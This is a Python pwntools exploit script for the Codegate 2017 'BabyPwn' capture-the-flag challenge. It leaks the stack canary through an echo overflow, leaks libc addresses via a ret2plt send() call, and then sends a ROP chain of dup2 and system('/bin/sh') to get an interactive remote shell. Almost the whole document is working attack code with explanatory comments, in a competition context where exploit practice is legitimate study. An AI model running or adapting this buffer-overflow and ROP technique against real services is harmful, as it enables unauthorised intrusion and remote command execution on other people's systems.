BabyPwn - Codegate 2017 - exploit
#!/usr/bin/python
import sys
import time

from pwn import *
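# --- Gadgets and offsets (32-bit target; all values are specific to the
# challenge binary and the libc it shipped with) ---
# pop2ret / pop4ret are gadgets inside the binary; sendGOT / sendPLT are its
# send() GOT slot and PLT stub.  The *off values are offsets inside the
# challenge's libc build and must be recomputed for any other libc.
pop2ret = 0x8048b84
pop4ret = 0x8048eec      # not used by the chains below; kept for reference
sendGOT = 0x0804b064
sendPLT = 0x08048700
sendoff = 0x000ed7f0
systemoff = 0x00040310
dup2off = 0x000db920
binsh_off = 0x16084c

# Target can be given on the command line (HOST PORT); the defaults keep the
# original localhost:8181 invocation working unchanged.
HOST = sys.argv[1] if len(sys.argv) > 1 else "localhost"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 8181

# Frame layout used by every payload: a 40-byte buffer, the stack canary,
# then 12 bytes of saved registers/padding before the saved return address.
BUF_LEN = 40
PAD_LEN = 12
# The service's fd for the accepted client socket.  Both the ret2plt leak and
# the dup2() calls in the final chain rely on this number.
CLIENT_FD = 0x4

# ---------------------------------------------------------------------------
# Stage 0: leak the stack canary.
# Menu 1 echoes the message back.  Sending exactly BUF_LEN bytes makes the
# newline appended by sendline() overwrite the canary's low NUL byte, so the
# echo runs on into the remaining three canary bytes.  The parsing below
# assumes the service prints a newline right after those three bytes (what
# the original author observed against the challenge service).
# ---------------------------------------------------------------------------
con = remote(HOST, PORT)
con.recvuntil("Select menu >")
con.sendline("1\n")                  # original sends an extra newline here; kept as-is
con.recvuntil("Input Your Message :")
con.sendline("A" * BUF_LEN)
con.recvuntil("\n")                  # the echoed A's, ended by the 0x0a that clobbered canary[0]
data = u32(con.recvuntil('\n'))      # canary[1..3] followed by the service's newline
canary = u32("\x00" + p32(data)[:-1])  # drop the newline, restore the low NUL byte
print("\n[+] CANARY: " + hex(canary))

# ---------------------------------------------------------------------------
# Stage 1: leak libc via ret2plt.
# Menu 2 stores the message (overflowing the frame); menu 3 returns into it.
# Chain: send(CLIENT_FD, &send@got, 4, 0) writes send()'s resolved address
# back to us.  The fake return address 0xdeadbeef then crashes this child,
# which is fine: a fresh connection is used for the final chain.
# ---------------------------------------------------------------------------
payload = "".join([
    "A" * BUF_LEN,
    p32(canary),
    "B" * PAD_LEN,
    p32(sendPLT),
    p32(0xdeadbeef),                 # return address after send(); never meant to be reached
    p32(CLIENT_FD),                  # sockfd
    p32(sendGOT),                    # buf
    p32(0x4),                        # len
    p32(0x0),                        # flags
])
con.recvuntil("Select menu >")
con.sendline("2")
con.recvuntil("Input Your Message :")
con.sendline(payload)
con.recvuntil("Select menu >")
con.sendline("3")
con.recv()                           # discard whatever the service prints before the chain runs
leaked = u32(con.recvn(4))           # u32() needs exactly 4 bytes; recv() returns an arbitrary chunk
con.close()                          # this child is gone (it returned to 0xdeadbeef); release the socket

libc_base = leaked - sendoff
# A libc base is always page aligned; anything else means the leak is garbage
# (wrong offsets / different libc, or stray bytes before the leaked value),
# and the final chain would only crash the service.
if libc_base & 0xfff:
    print("[-] leaked send() = " + hex(leaked) + " gives unaligned libc base "
          + hex(libc_base) + " -- wrong libc offsets?")
    sys.exit(1)
system = libc_base + systemoff
bin_sh = libc_base + binsh_off
dup2 = libc_base + dup2off
print("[+] send GOT : " + hex(leaked))
print("[+] LIBC BASE : " + hex(libc_base))
print("[+] system() : " + hex(system))
print("[+] dup2 : " + hex(dup2))
print("[+] /bin//sh : " + hex(bin_sh))

# ---------------------------------------------------------------------------
# Stage 2: new connection, same overflow, ROP to a shell.
# The canary and libc base from the first connection are reused: this only
# works if the service forks per connection so every child inherits the same
# canary and libc mapping -- TODO confirm against the target.
# Chain: dup2(CLIENT_FD, 0); dup2(CLIENT_FD, 1); system("/bin/sh"), so the
# shell's stdin/stdout are the socket.  pop2ret pops the two dup2 arguments
# between calls; the 0x41414141 return address after system() is never used.
# ---------------------------------------------------------------------------
con = remote(HOST, PORT)
final = "".join([
    "A" * BUF_LEN,
    p32(canary),
    "B" * PAD_LEN,
    p32(dup2), p32(pop2ret), p32(CLIENT_FD), p32(0x0),   # dup2(sock, stdin)
    p32(dup2), p32(pop2ret), p32(CLIENT_FD), p32(0x1),   # dup2(sock, stdout)
    p32(system), p32(0x41414141), p32(bin_sh),           # system("/bin/sh")
])
con.recvuntil("Select menu >")
con.sendline("2")
con.recvuntil("Input Your Message :")
con.sendline(final)
con.recvuntil("Select menu >")
con.sendline("3")
con.interactive()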